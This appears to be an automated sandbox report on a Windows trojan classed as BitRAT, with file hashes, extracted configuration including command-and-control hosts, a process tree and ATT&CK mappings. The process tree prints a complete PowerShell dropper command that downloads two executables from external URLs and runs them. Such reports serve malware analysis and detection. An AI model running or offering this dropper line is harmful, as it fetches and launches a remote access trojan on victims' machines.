Overview

overview

10

Static

static

SecuriteIn...53.exe

windows7_x64

10

SecuriteIn...53.exe

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    29-01-2022 15:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe

  • Size

    46KB

  • MD5

    0c3281387e69e28ac3865135420ec039

  • SHA1

    068bd09ad5f8dae225da6b53754823ed6f194973

  • SHA256

    2d3c256a17925e5102852d2a9ecd212d9118ae9003b9c6cc064a598ef95e4891

  • SHA512

    d8d7a8b678b37b91206db130cbefd522a8b6d3e1617acb981a1ae4367dc48c311ac64b9e973b14bdb0ff9cc6b62481f55b541791244b664907c95a29d9f9ceb0

Score
10/10
bitratpersistencetrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/935052169835593748/936025628916973638/hissbitrat.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/935052169835593748/936025629655175188/mybitrat.exe

Extracted

Family

bitrat

Version

1.38

C2

linksphere.duckdns.org:1440

anubisgod.duckdns.org:1442
Attributes
  • communication_password

    81dc9bdb52d04dc20036dbd8313ed055

  • install_dir

    Queeno

  • install_file

    Queenol.exe

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

    trojanbitrat
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1552
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/936025628916973638/hissbitrat.exe', (Join-Path -Path $env:AppData -ChildPath 'hissbitrat.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/936025629655175188/mybitrat.exe', (Join-Path -Path $env:AppData -ChildPath 'mybitrat.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hissbitrat.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'mybitrat.exe')" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1528
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/936025628916973638/hissbitrat.exe', (Join-Path -Path $env:AppData -ChildPath 'hissbitrat.exe'))"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1372
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/936025629655175188/mybitrat.exe', (Join-Path -Path $env:AppData -ChildPath 'mybitrat.exe'))"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1788
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hissbitrat.exe')"
        3⤵
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1052
        • C:\Users\Admin\AppData\Roaming\hissbitrat.exe
          "C:\Users\Admin\AppData\Roaming\hissbitrat.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1196
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'mybitrat.exe')"
        3⤵
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:992
        • C:\Users\Admin\AppData\Roaming\mybitrat.exe
          "C:\Users\Admin\AppData\Roaming\mybitrat.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1232

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1
T1060

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    MD5

    76eef2d78f82e0490da18f9a464f0f7c

    SHA1

    cd5639659eeeab962ede47c56baec3c9fcda3997

    SHA256

    9a2e42224c333125f4f216607ec1518dce1122416fcae2472d110972f3405be0

    SHA512

    442d548eb4d65f26b60c9bfadd67a05ab79fc7003a7bcfc90bab71467bc136434dc31f0cad8745a7c1c3dba07eac84c5aa111fc462605b60ec991fb73ea829f9

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    MD5

    76eef2d78f82e0490da18f9a464f0f7c

    SHA1

    cd5639659eeeab962ede47c56baec3c9fcda3997

    SHA256

    9a2e42224c333125f4f216607ec1518dce1122416fcae2472d110972f3405be0

    SHA512

    442d548eb4d65f26b60c9bfadd67a05ab79fc7003a7bcfc90bab71467bc136434dc31f0cad8745a7c1c3dba07eac84c5aa111fc462605b60ec991fb73ea829f9

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    MD5

    76eef2d78f82e0490da18f9a464f0f7c

    SHA1

    cd5639659eeeab962ede47c56baec3c9fcda3997

    SHA256

    9a2e42224c333125f4f216607ec1518dce1122416fcae2472d110972f3405be0

    SHA512

    442d548eb4d65f26b60c9bfadd67a05ab79fc7003a7bcfc90bab71467bc136434dc31f0cad8745a7c1c3dba07eac84c5aa111fc462605b60ec991fb73ea829f9

    Download Submit
  • C:\Users\Admin\AppData\Roaming\hissbitrat.exe
    MD5

    09931bfc16fb78b4b9952931b70146a8

    SHA1

    4f2bc81788297b42d31d4468293cd5ae550df606

    SHA256

    3fb7cf15e0dedf52f522b021a21ba82f30c544bc8ee20adf3695e8d0f9f8550d

    SHA512

    b1f2b67c8ce78d129a97abc7e1d17efa07837460d3bee3ad8a108bedaac82c8206bc3485ff30822ef9b9356ca95073c0f3a57f1ee08bf9ba5f387b192ebb7158

    Download Submit
  • C:\Users\Admin\AppData\Roaming\hissbitrat.exe
    MD5

    09931bfc16fb78b4b9952931b70146a8

    SHA1

    4f2bc81788297b42d31d4468293cd5ae550df606

    SHA256

    3fb7cf15e0dedf52f522b021a21ba82f30c544bc8ee20adf3695e8d0f9f8550d

    SHA512

    b1f2b67c8ce78d129a97abc7e1d17efa07837460d3bee3ad8a108bedaac82c8206bc3485ff30822ef9b9356ca95073c0f3a57f1ee08bf9ba5f387b192ebb7158

    Download Submit
  • C:\Users\Admin\AppData\Roaming\mybitrat.exe
    MD5

    fa6bfb0013165303096d3eb53ca7ed7a

    SHA1

    6b8caf8c8a673fd15bb4146cfe0ab89cb3e1a53d

    SHA256

    445fe1640edcbcd3c21ea1ee3e839f87fbf2970d7f9e6b027287f85bb536a0d7

    SHA512

    2cbf81409db2dd73772b02abc06e04b44ebf62aae164459bec2470f9b36827e1fed193ea438ef4b98575b592d729097ceb09abb88c5e4e3d52ef75078e479f1a

    Download Submit
  • C:\Users\Admin\AppData\Roaming\mybitrat.exe
    MD5

    fa6bfb0013165303096d3eb53ca7ed7a

    SHA1

    6b8caf8c8a673fd15bb4146cfe0ab89cb3e1a53d

    SHA256

    445fe1640edcbcd3c21ea1ee3e839f87fbf2970d7f9e6b027287f85bb536a0d7

    SHA512

    2cbf81409db2dd73772b02abc06e04b44ebf62aae164459bec2470f9b36827e1fed193ea438ef4b98575b592d729097ceb09abb88c5e4e3d52ef75078e479f1a

    Download Submit
  • \Users\Admin\AppData\Roaming\hissbitrat.exe
    MD5

    09931bfc16fb78b4b9952931b70146a8

    SHA1

    4f2bc81788297b42d31d4468293cd5ae550df606

    SHA256

    3fb7cf15e0dedf52f522b021a21ba82f30c544bc8ee20adf3695e8d0f9f8550d

    SHA512

    b1f2b67c8ce78d129a97abc7e1d17efa07837460d3bee3ad8a108bedaac82c8206bc3485ff30822ef9b9356ca95073c0f3a57f1ee08bf9ba5f387b192ebb7158

    Download Submit
  • \Users\Admin\AppData\Roaming\hissbitrat.exe
    MD5

    09931bfc16fb78b4b9952931b70146a8

    SHA1

    4f2bc81788297b42d31d4468293cd5ae550df606

    SHA256

    3fb7cf15e0dedf52f522b021a21ba82f30c544bc8ee20adf3695e8d0f9f8550d

    SHA512

    b1f2b67c8ce78d129a97abc7e1d17efa07837460d3bee3ad8a108bedaac82c8206bc3485ff30822ef9b9356ca95073c0f3a57f1ee08bf9ba5f387b192ebb7158

    Download Submit
  • \Users\Admin\AppData\Roaming\mybitrat.exe
    MD5

    fa6bfb0013165303096d3eb53ca7ed7a

    SHA1

    6b8caf8c8a673fd15bb4146cfe0ab89cb3e1a53d

    SHA256

    445fe1640edcbcd3c21ea1ee3e839f87fbf2970d7f9e6b027287f85bb536a0d7

    SHA512

    2cbf81409db2dd73772b02abc06e04b44ebf62aae164459bec2470f9b36827e1fed193ea438ef4b98575b592d729097ceb09abb88c5e4e3d52ef75078e479f1a

    Download Submit
  • \Users\Admin\AppData\Roaming\mybitrat.exe
    MD5

    fa6bfb0013165303096d3eb53ca7ed7a

    SHA1

    6b8caf8c8a673fd15bb4146cfe0ab89cb3e1a53d

    SHA256

    445fe1640edcbcd3c21ea1ee3e839f87fbf2970d7f9e6b027287f85bb536a0d7

    SHA512

    2cbf81409db2dd73772b02abc06e04b44ebf62aae164459bec2470f9b36827e1fed193ea438ef4b98575b592d729097ceb09abb88c5e4e3d52ef75078e479f1a

    Download Submit
  • memory/992-74-0x0000000002440000-0x000000000308A000-memory.dmp
    Filesize

    12.3MB

    Download
  • memory/1052-68-0x0000000002410000-0x000000000305A000-memory.dmp
    Filesize

    12.3MB

    Download
  • memory/1372-55-0x0000000075B11000-0x0000000075B13000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1372-56-0x00000000023A0000-0x0000000002FEA000-memory.dmp
    Filesize

    12.3MB

    Download
  • memory/1788-61-0x00000000023F0000-0x000000000303A000-memory.dmp
    Filesize

    12.3MB

    Download